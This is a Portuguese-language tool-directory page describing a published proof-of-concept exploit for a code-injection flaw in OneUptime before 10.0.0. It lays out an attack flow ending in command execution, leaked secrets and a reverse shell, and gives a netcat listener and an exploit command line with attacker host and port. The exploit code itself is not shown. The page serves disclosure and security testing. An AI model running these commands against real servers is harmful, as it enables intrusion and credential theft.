Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-27574-OneUptime-RCE — Prova de conceito de exploit para CVE-2026-27574, uma injeção de código crítica no OneUptime que permite execução remota de código e vazamento de variáveis de ambiente. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Prova de conceito de exploit para CVE-2026-27574, uma injeção de código crítica no OneUptime que permite execução remota de código e vazamento de variáveis de ambiente.

Ver Repositório
15há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Visão Geral

Exploit de Prova de Conceito para CVE-2026-27574 – uma vulnerabilidade crítica de injeção de código (CWE-94) no OneUptime < 10.0.0 que permite execução arbitrária de JavaScript no contexto do probe, levando a completa e vazamento de variáveis de ambiente sensíveis.

execução remota de código (RCE)

Corrigido em: OneUptime 10.0.0 (migração para isolated-vm)

Tipo de exploit: Remoto
Autenticação: Baixo privilégio (qualquer membro registrado do projeto)
Impacto: Comprometimento total do servidor, roubo de credenciais, tomada do cluster

Diagrama do Fluxo de Ataque

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Recursos deste PoC

  • Registro automático de conta
  • Criação de projeto
  • Criação de monitor JavaScript malicioso
  • Vazamento de variáveis de ambiente
  • Prova básica de execução de comandos
  • Payload opcional de reverse shell (comentado)

Uso

root@kitploit:~
# Iniciar listener (se usar reverse shell)
nc -lvnp 4444

# Executar o exploit
python3 exploit.py http://target:3002 --lhost SEU_IP --lport 4444

Requisitos

  • Python 3.6+
  • Biblioteca requests (pip install requests)

Aviso Legal e Ético

Este código é fornecido apenas para fins educacionais e de testes de segurança autorizados.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.

Referências

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • Patch Commit

Desenvolvido por Mohammed Idrees Banyamer • Jordânia • @banyamer_security

Baixar ferramenta